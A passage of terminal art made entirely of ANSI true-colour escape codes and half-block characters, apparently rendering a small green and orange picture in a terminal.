\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m\e[38;2;96;174;76m▄\e[48;2;98;177;78m\e[38;2;74;130;59m▄\e[48;2;98;176;78m\e[38;2;32;49;27m▄\e[48;2;95;166;76m\e[38;2;18;29;15m▄\e[48;2;73;126;59m\e[38;2;65;113;53m▄\e[48;2;40;62;34m\e[38;2;107;209;83m▄\e[48;2;23;43;19m\e[38;2;77;220;42m▄\e[48;2;32;72;22m\e[38;2;72;218;36m▄\e[48;2;55;155;30m\e[38;2;73;217;37m▄\e[48;2;71;203;38m\e[38;2;73;217;37m▄\e[48;2;79;212;46m\e[38;2;73;218;37m▄\e[48;2;81;216;48m\e[38;2;73;218;37m▄\e[48;2;82;220;48m\e[38;2;73;218;37m▄\e[48;2;79;221;44m\e[38;2;73;218;37m▄\e[48;2;76;219;40m\e[38;2;73;218;37m▄\e[48;2;76;218;40m\e[38;2;73;218;37m▄\e[48;2;75;213;41m\e[38;2;73;218;37m▄\e[48;2;79;203;48m\e[38;2;73;218;37m▄\e[48;2;76;175;52m\e[38;2;73;218;37m▄\e[48;2;52;127;33m\e[38;2;73;218;37m▄\e[48;2;29;75;18m\e[38;2;73;217;37m▄\e[48;2;19;45;12m\e[38;2;73;218;36m▄\e[48;2;45;74;38m\e[38;2;65;196;33m▄\e[48;2;76;127;62m\e[38;2;44;132;24m▄\e[48;2;90;158;72m\e[38;2;16;45;10m▄\e[48;2;97;175;77m\e[38;2;28;50;22m▄\e[48;2;98;177;78m\e[38;2;80;145;64m▄\e[48;2;98;177;78m\e[38;2;97;175;77m▄\e[48;2;98;177;78m\e[38;2;97;176;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;176;78m▄\e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;97;173;78m\e[38;2;98;177;78m▄\e[48;2;69;114;56m\e[38;2;98;177;78m▄\e[48;2;30;38;28m\e[38;2;103;179;83m▄\e[48;2;91;91;91m\e[38;2;99;149;87m▄\e[48;2;188;188;188m\e[38;2;39;53;36m▄\e[0m + \e[48;2;98;177;78m\e[38;2;98;177;77m▄\e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m \e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;98;178;78m▄\e[48;2;98;177;78m\e[38;2;83;150;66m▄\e[48;2;98;177;78m\e[38;2;44;80;34m▄\e[48;2;99;179;78m\e[38;2;33;49;28m▄\e[48;2;87;159;69m\e[38;2;68;97;61m▄\e[48;2;46;84;37m\e[38;2;87;165;68m▄\e[48;2;25;37;21m\e[38;2;83;208;52m▄\e[48;2;59;131;42m\e[38;2;73;219;37m▄\e[48;2;74;199;43m\e[38;2;74;223;37m▄\e[48;2;72;213;38m\e[38;2;67;204;35m▄\e[48;2;73;218;37m\e[38;2;55;171;29m▄\e[48;2;72;218;36m\e[38;2;59;136;22m▄\e[48;2;72;218;36m\e[38;2;103;132;15m▄\e[48;2;73;219;37m\e[38;2;149;133;9m▄\e[48;2;72;220;37m\e[38;2;168;130;7m▄\e[48;2;73;220;37m\e[38;2;167;118;5m▄\e[48;2;72;218;37m\e[38;2;106;78;4m▄\e[48;2;69;210;36m\e[38;2;93;69;4m▄\e[48;2;66;199;34m\e[38;2;173;117;4m▄\e[48;2;63;192;32m\e[38;2;177;119;4m▄\e[48;2;62;186;32m\e[38;2;173;116;4m▄\e[48;2;61;186;31m\e[38;2;176;115;4m▄\e[48;2;63;191;32m\e[38;2;174;115;4m▄\e[48;2;67;202;34m\e[38;2;170;113;4m▄\e[48;2;70;213;36m\e[38;2;180;118;3m▄\e[48;2;72;219;37m\e[38;2;175;117;4m▄\e[48;2;73;220;37m\e[38;2;154;120;7m▄\e[48;2;73;220;37m\e[38;2;80;94;11m▄\e[48;2;73;219;37m\e[38;2;48;93;15m▄\e[48;2;73;218;37m\e[38;2;41;112;19m▄\e[48;2;72;215;36m\e[38;2;45;144;25m▄\e[48;2;64;192;32m\e[38;2;63;191;32m▄\e[48;2;32;99;16m\e[38;2;73;218;37m▄\e[48;2;21;41;16m\e[38;2;72;210;38m▄\e[48;2;38;66;30m\e[38;2;67;177;41m▄\e[48;2;79;141;63m\e[38;2;53;123;36m▄\e[48;2;98;178;78m\e[38;2;32;57;25m▄\e[48;2;98;179;77m\e[38;2;25;46;20m▄\e[48;2;97;177;77m\e[38;2;56;100;46m▄\e[48;2;98;177;78m\e[38;2;93;165;75m▄\e[48;2;97;176;77m\e[38;2;100;181;80m▄\e[48;2;98;177;77m\e[38;2;97;176;76m▄\e[48;2;97;176;78m\e[38;2;98;177;78m▄\e[48;2;99;174;79m\e[38;2;98;177;78m▄\e[0m + \e[48;2;98;178;78m\e[38;2;46;76;38m▄\e[48;2;100;178;80m\e[38;2;50;69;45m▄\e[48;2;99;176;80m\e[38;2;35;46;33m▄\e[48;2;82;148;65m\e[38;2;7;9;6m▄\e[48;2;64;117;50m\e[38;2;35;54;30m▄\e[48;2;42;77;34m\e[38;2;52;107;39m▄\e[48;2;26;46;21m\e[38;2;80;194;52m▄\e[48;2;34;71;26m\e[38;2;73;216;38m▄\e[48;2;54;133;35m\e[38;2;67;192;32m▄\e[48;2;81;199;52m\e[38;2;81;158;23m▄\e[48;2;80;218;46m\e[38;2;100;110;11m▄\e[48;2;66;199;33m\e[38;2;152;98;2m▄\e[48;2;60;157;26m\e[38;2;220;129;1m▄\e[48;2;80;128;18m\e[38;2;251;145;0m▄\e[48;2;120;110;9m\e[38;2;255;147;0m▄\e[48;2;154;106;4m\e[38;2;255;147;0m▄\e[48;2;181;114;2m\e[38;2;255;147;0m▄\e[48;2;230;134;0m\e[38;2;255;147;0m▄\e[48;2;251;144;0m\e[38;2;255;147;0m▄\e[48;2;254;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;163;94;0m\e[38;2;134;78;0m▄\e[48;2;2;1;0m\e[38;2;58;33;0m▄\e[48;2;13;7;0m\e[38;2;133;76;0m▄\e[48;2;64;38;0m\e[38;2;12;7;0m▄\e[48;2;250;144;0m\e[38;2;234;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;146;0m\e[38;2;255;147;0m▄\e[48;2;239;143;2m\e[38;2;255;147;0m▄\e[48;2;223;131;1m\e[38;2;255;147;0m▄\e[48;2;192;120;2m\e[38;2;255;147;0m▄\e[48;2;130;96;5m\e[38;2;255;147;0m▄\e[48;2;82;88;9m\e[38;2;255;148;0m▄\e[48;2;62;104;15m\e[38;2;247;147;1m▄\e[48;2;49;132;22m\e[38;2;212;134;3m▄\e[48;2;57;165;32m\e[38;2;144;95;3m▄\e[48;2;53;117;38m\e[38;2;74;61;8m▄\e[48;2;50;97;39m\e[38;2;47;60;21m▄\e[48;2;35;56;29m\e[38;2;47;81;33m▄\e[48;2;17;22;15m\e[38;2;20;34;19m▄\e[48;2;31;50;26m\e[38;2;48;73;42m▄\e[48;2;55;90;47m\e[38;2;37;56;33m▄\e[48;2;78;132;64m\e[38;2;21;31;18m▄\e[48;2;95;167;78m\e[38;2;18;26;16m▄\e[0m + \e[48;2;48;74;43m\e[38;2;51;78;45m▄\e[48;2;48;74;43m\e[38;2;50;76;44m▄\e[48;2;46;71;42m\e[38;2;12;17;11m▄\e[48;2;32;54;28m\e[38;2;45;93;35m▄\e[48;2;58;112;46m\e[38;2;26;45;17m▄\e[48;2;55;130;37m\e[38;2;121;83;5m▄\e[48;2;57;133;27m\e[38;2;232;138;0m▄\e[48;2;101;96;8m\e[38;2;253;146;0m▄\e[48;2;200;118;1m\e[38;2;254;147;0m▄\e[48;2;248;144;0m\e[38;2;255;147;0m▄\e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;173;100;0m\e[38;2;210;122;0m▄\e[48;2;172;100;0m\e[38;2;76;44;0m▄\e[48;2;214;123;0m\e[38;2;153;88;0m▄\e[48;2;36;21;0m\e[38;2;162;94;0m▄\e[48;2;201;116;0m\e[38;2;20;12;0m▄\e[48;2;254;147;0m\e[38;2;238;137;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;241;143;1m\e[38;2;255;147;0m▄\e[48;2;213;125;0m\e[38;2;255;147;0m▄\e[48;2;117;73;3m\e[38;2;252;147;1m▄\e[48;2;25;36;21m\e[38;2;94;69;18m▄\e[48;2;50;77;44m\e[38;2;39;59;33m▄\e[48;2;51;78;45m \e[48;2;51;78;44m\e[38;2;51;78;45m▄\e[0m + \e[48;2;51;78;45m\e[38;2;50;76;44m▄\e[48;2;40;58;34m\e[38;2;43;36;13m▄\e[48;2;38;37;6m\e[38;2;240;143;2m▄\e[48;2;149;95;6m\e[38;2;254;147;0m▄\e[48;2;226;134;1m\e[38;2;255;147;0m▄\e[48;2;253;146;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;243;140;0m▄\e[48;2;116;67;0m\e[38;2;90;52;0m▄\e[48;2;237;137;0m\e[38;2;254;147;0m▄\e[48;2;248;143;0m\e[38;2;255;147;0m▄\e[48;2;250;144;0m\e[38;2;255;147;0m▄\e[48;2;45;25;0m\e[38;2;191;110;0m▄\e[48;2;64;36;0m\e[38;2;32;18;0m▄\e[48;2;245;141;0m\e[38;2;152;87;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;255;147;0m▄\e[48;2;230;140;6m\e[38;2;254;147;0m▄\e[48;2;25;21;7m\e[38;2;143;86;2m▄\e[48;2;48;74;42m\e[38;2;39;60;34m▄\e[48;2;51;78;45m \e[0m + \e[48;2;41;63;37m\e[38;2;40;47;23m▄\e[48;2;119;70;1m\e[38;2;230;135;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;180;104;0m\e[38;2;120;68;0m▄\e[48;2;135;78;0m\e[38;2;158;91;0m▄\e[48;2;255;147;0m\e[38;2;250;145;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;146;0m▄\e[48;2;252;145;0m\e[38;2;209;120;0m▄\e[48;2;54;31;0m\e[38;2;61;35;0m▄\e[48;2;94;54;0m\e[38;2;159;91;0m▄\e[48;2;254;146;0m\e[38;2;244;140;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;240;144;1m\e[38;2;255;147;0m▄\e[48;2;36;40;18m\e[38;2;70;49;6m▄\e[48;2;50;78;45m\e[38;2;45;69;40m▄\e[0m + \e[48;2;65;48;9m\e[38;2;98;64;6m▄\e[48;2;255;149;0m\e[38;2;255;147;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;254;147;0m\e[38;2;254;146;0m▄\e[48;2;225;130;0m\e[38;2;175;100;0m▄\e[48;2;210;120;0m\e[38;2;253;146;0m▄\e[48;2;209;121;0m\e[38;2;254;147;0m▄\e[48;2;86;49;0m\e[38;2;189;109;0m▄\e[48;2;254;146;0m\e[38;2;142;81;0m▄\e[48;2;255;147;0m\e[38;2;102;59;0m▄\e[48;2;199;115;0m\e[38;2;69;40;0m▄\e[48;2;244;141;0m\e[38;2;238;138;0m▄\e[48;2;253;146;0m\e[38;2;184;105;0m▄\e[48;2;200;115;0m\e[38;2;231;134;0m▄\e[48;2;253;147;0m\e[38;2;254;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;149;98;7m\e[38;2;215;132;5m▄\e[48;2;35;54;32m\e[38;2;31;42;22m▄\e[0m + \e[48;2;133;82;3m\e[38;2;153;89;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m\e[38;2;255;146;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;248;147;0m▄\e[48;2;254;147;0m\e[38;2;242;142;0m▄\e[48;2;204;116;0m\e[38;2;224;131;0m▄\e[48;2;200;115;0m\e[38;2;205;124;1m▄\e[48;2;199;115;0m\e[38;2;175;109;2m▄\e[48;2;172;100;0m\e[38;2;157;102;2m▄\e[48;2;168;97;0m\e[38;2;172;114;3m▄\e[48;2;206;119;0m\e[38;2;156;115;5m▄\e[48;2;215;125;0m\e[38;2;138;111;7m▄\e[48;2;180;105;0m\e[38;2;121;105;8m▄\e[48;2;233;136;0m\e[38;2;120;109;8m▄\e[48;2;254;148;0m\e[38;2;116;111;9m▄\e[48;2;254;148;0m\e[38;2;112;111;10m▄\e[48;2;255;148;0m\e[38;2;130;121;10m▄\e[48;2;254;148;0m\e[38;2;103;105;10m▄\e[48;2;254;148;0m\e[38;2;99;99;9m▄\e[48;2;254;148;0m\e[38;2;106;98;8m▄\e[48;2;254;148;0m\e[38;2;106;96;8m▄\e[48;2;255;148;0m\e[38;2;118;98;7m▄\e[48;2;255;147;0m\e[38;2;123;101;7m▄\e[48;2;255;147;0m\e[38;2;129;99;6m▄\e[48;2;255;147;0m\e[38;2;141;100;5m▄\e[48;2;255;147;0m\e[38;2;166;111;4m▄\e[48;2;255;147;0m\e[38;2;189;122;4m▄\e[48;2;255;147;0m\e[38;2;217;131;1m▄\e[48;2;255;147;0m\e[38;2;248;145;0m▄\e[48;2;255;147;0m\e[38;2;250;148;0m▄\e[48;2;255;147;0m\e[38;2;254;149;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;249;147;1m\e[38;2;254;147;0m▄\e[48;2;47;44;15m\e[38;2;81;54;7m▄\e[0m + \e[48;2;163;95;0m\e[38;2;176;103;0m▄\e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m \e[48;2;255;147;0m\e[38;2;254;147;0m▄\e[48;2;255;147;0m\e[38;2;250;144;0m▄\e[48;2;255;147;0m\e[38;2;238;146;1m▄\e[48;2;254;147;0m\e[38;2;170;117;4m▄\e[48;2;252;147;0m\e[38;2;78;65;5m▄\e[48;2;239;144;1m\e[38;2;36;71;11m▄\e[48;2;220;136;2m\e[38;2;41;122;21m▄\e[48;2;193;124;2m\e[38;2;59;179;31m▄\e[48;2;178;119;4m\e[38;2;69;210;35m▄\e[48;2;129;104;6m\e[38;2;73;219;37m▄\e[48;2;67;87;10m\e[38;2;73;219;37m▄\e[48;2;61;106;15m\e[38;2;73;218;37m▄\e[48;2;52;126;21m\e[38;2;73;218;37m▄\e[48;2;52;150;25m\e[38;2;73;218;37m▄\e[48;2;58;177;30m\e[38;2;73;218;37m▄\e[48;2;63;194;33m\e[38;2;73;218;37m▄\e[48;2;66;204;34m\e[38;2;73;218;37m▄\e[48;2;69;212;36m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;72;219;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;74;220;37m\e[38;2;73;218;37m▄\e[48;2;73;220;37m\e[38;2;73;218;37m▄\e[48;2;73;219;37m\e[38;2;73;218;37m▄\e[48;2;72;214;36m\e[38;2;73;218;37m▄\e[48;2;68;207;35m\e[38;2;73;218;37m▄\e[48;2;65;197;34m\e[38;2;73;218;37m▄\e[48;2;61;185;32m\e[38;2;73;218;37m▄\e[48;2;51;157;27m\e[38;2;73;218;37m▄\e[48;2;41;125;21m\e[38;2;73;218;37m▄\e[48;2;40;106;18m\e[38;2;73;218;37m▄\e[48;2;75;92;10m\e[38;2;73;218;37m▄\e[48;2;76;85;10m\e[38;2;73;219;37m▄\e[48;2;112;94;7m\e[38;2;72;216;36m▄\e[48;2;162;113;5m\e[38;2;64;194;33m▄\e[48;2;219;131;0m\e[38;2;50;152;26m▄\e[48;2;231;138;1m\e[38;2;30;65;14m▄\e[48;2;252;147;0m\e[38;2;106;71;5m▄\e[48;2;97;61;4m\e[38;2;30;31;7m▄\e[0m + \e[48;2;186;108;0m\e[38;2;185;108;0m▄\e[48;2;255;147;0m\e[38;2;254;148;0m▄\e[48;2;255;147;0m\e[38;2;247;144;0m▄\e[48;2;255;147;0m\e[38;2;188;113;1m▄\e[48;2;255;147;0m\e[38;2;110;100;8m▄\e[48;2;248;147;0m\e[38;2;72;136;20m▄\e[48;2;206;124;1m\e[38;2;62;175;29m▄\e[48;2;115;81;4m\e[38;2;67;204;34m▄\e[48;2;55;92;13m\e[38;2;72;217;36m▄\e[48;2;60;157;26m\e[38;2;73;218;37m▄\e[48;2;66;195;32m\e[38;2;73;218;37m▄\e[48;2;70;212;35m\e[38;2;73;218;37m▄\e[48;2;72;215;36m\e[38;2;73;218;37m▄\e[48;2;73;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;210;37m\e[38;2;71;214;37m▄\e[48;2;58;142;37m\e[38;2;57;136;37m▄\e[48;2;51;109;39m\e[38;2;54;109;40m▄\e[48;2;36;76;26m\e[38;2;38;71;31m▄\e[0m + \e[48;2;73;63;12m\e[38;2;24;46;20m▄\e[48;2;89;67;7m\e[38;2;54;120;38m▄\e[48;2;67;119;19m\e[38;2;66;192;35m▄\e[48;2;61;177;29m\e[38;2;73;217;37m▄\e[48;2;71;213;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;214;35m\e[38;2;42;129;21m▄\e[48;2;43;131;22m\e[38;2;4;10;2m▄\e[48;2;37;111;19m\e[38;2;4;10;2m▄\e[48;2;60;180;30m\e[38;2;7;22;3m▄\e[48;2;73;218;37m\e[38;2;62;187;31m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;72;217;36m▄\e[48;2;69;208;35m\e[38;2;20;61;10m▄\e[48;2;43;129;22m\e[38;2;4;11;2m▄\e[48;2;38;116;19m\e[38;2;3;8;1m▄\e[48;2;64;192;32m\e[38;2;19;57;10m▄\e[48;2;73;218;37m\e[38;2;73;219;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;214;36m\e[38;2;71;213;36m▄\e[48;2;55;130;37m\e[38;2;55;123;38m▄\e[48;2;54;108;41m\e[38;2;56;110;44m▄\e[48;2;35;60;30m\e[38;2;35;57;30m▄\e[0m + \e[48;2;37;68;29m\e[38;2;38;61;33m▄\e[48;2;58;132;39m\e[38;2;62;134;45m▄\e[48;2;64;179;36m\e[38;2;55;129;37m▄\e[48;2;72;217;36m\e[38;2;71;210;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;27;82;14m\e[38;2;59;178;30m▄\e[48;2;4;11;3m\e[38;2;3;9;1m▄\e[48;2;0;0;0m\e[38;2;8;18;4m▄\e[48;2;1;3;1m\e[38;2;4;12;2m▄\e[48;2;36;112;19m\e[38;2;54;163;27m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;210;36m\e[38;2;72;217;36m▄\e[48;2;4;11;1m\e[38;2;9;28;4m▄\e[48;2;0;0;0m\e[38;2;6;16;3m▄\e[48;2;1;3;1m\e[38;2;6;15;3m▄\e[48;2;13;39;6m\e[38;2;32;94;15m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;70;207;36m\e[38;2;67;196;36m▄\e[48;2;52;110;38m \e[48;2;57;101;47m\e[38;2;56;90;47m▄\e[48;2;36;55;31m\e[38;2;38;58;33m▄\e[0m + \e[48;2;40;63;35m\e[38;2;43;67;38m▄\e[48;2;61;117;48m\e[38;2;45;80;38m▄\e[48;2;54;114;39m\e[38;2;52;110;38m▄\e[48;2;64;177;36m\e[38;2;59;150;37m▄\e[48;2;72;217;36m\e[38;2;72;214;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;61;182;30m\e[38;2;73;218;37m▄\e[48;2;45;135;22m\e[38;2;73;218;37m▄\e[48;2;58;174;29m\e[38;2;73;218;37m▄\e[48;2;72;217;36m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;71;212;35m\e[38;2;72;216;36m▄\e[48;2;34;101;17m\e[38;2;11;32;5m▄\e[48;2;34;101;17m\e[38;2;1;2;1m▄\e[48;2;34;98;18m\e[38;2;1;3;1m▄\e[48;2;35;101;18m\e[38;2;1;1;1m▄\e[48;2;35;100;17m\e[38;2;1;3;1m▄\e[48;2;57;170;29m\e[38;2;56;168;28m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;72;218;36m▄\e[48;2;66;197;33m\e[38;2;72;217;36m▄\e[48;2;46;139;23m\e[38;2;73;217;37m▄\e[48;2;54;163;27m\e[38;2;72;217;37m▄\e[48;2;71;212;36m\e[38;2;72;217;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;37m\e[38;2;70;204;36m▄\e[48;2;60;158;37m\e[38;2;53;122;37m▄\e[48;2;52;103;38m\e[38;2;52;104;40m▄\e[48;2;33;54;28m\e[38;2;21;34;18m▄\e[48;2;46;70;41m\e[38;2;49;76;44m▄\e[0m + \e[48;2;49;76;44m\e[38;2;51;78;45m▄\e[48;2;32;51;28m\e[38;2;43;65;37m▄\e[48;2;61;125;45m\e[38;2;81;124;71m▄\e[48;2;54;124;38m\e[38;2;53;113;40m▄\e[48;2;68;202;36m\e[38;2;60;156;37m▄\e[48;2;73;218;37m\e[38;2;72;215;36m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m\e[38;2;73;216;37m▄\e[48;2;73;217;37m\e[38;2;93;205;61m▄\e[48;2;79;213;44m\e[38;2;121;189;95m▄\e[48;2;85;210;51m\e[38;2;132;184;108m▄\e[48;2;82;211;47m\e[38;2;121;191;93m▄\e[48;2;73;217;37m\e[38;2;85;210;52m▄\e[48;2;73;218;37m\e[38;2;73;217;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;37;111;20m\e[38;2;71;214;36m▄\e[48;2;1;2;0m\e[38;2;44;128;22m▄\e[48;2;2;4;2m\e[38;2;15;39;8m▄\e[48;2;1;1;1m\e[38;2;29;82;14m▄\e[48;2;13;37;7m\e[38;2;68;204;34m▄\e[48;2;70;210;35m\e[38;2;73;218;37m▄\e[48;2;73;217;37m\e[38;2;73;218;37m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;217;37m\e[38;2;74;216;38m▄\e[48;2;82;211;47m\e[38;2;118;191;90m▄\e[48;2;100;200;70m\e[38;2;132;185;108m▄\e[48;2;103;201;72m\e[38;2;127;187;101m▄\e[48;2;98;203;67m\e[38;2;125;189;100m▄\e[48;2;85;209;52m\e[38;2;116;192;88m▄\e[48;2;73;217;37m\e[38;2;80;211;44m▄\e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;73;218;37m \e[48;2;72;217;36m\e[38;2;68;200;35m▄\e[48;2;63;170;35m\e[38;2;54;125;36m▄\e[48;2;51;103;38m\e[38;2;51;99;38m▄\e[48;2;49;101;36m\e[38;2;22;45;17m▄\e[48;2;30;47;26m\e[38;2;45;69;39m▄\e[48;2;51;78;45m \e[0m + \e[48;2;51;78;45m 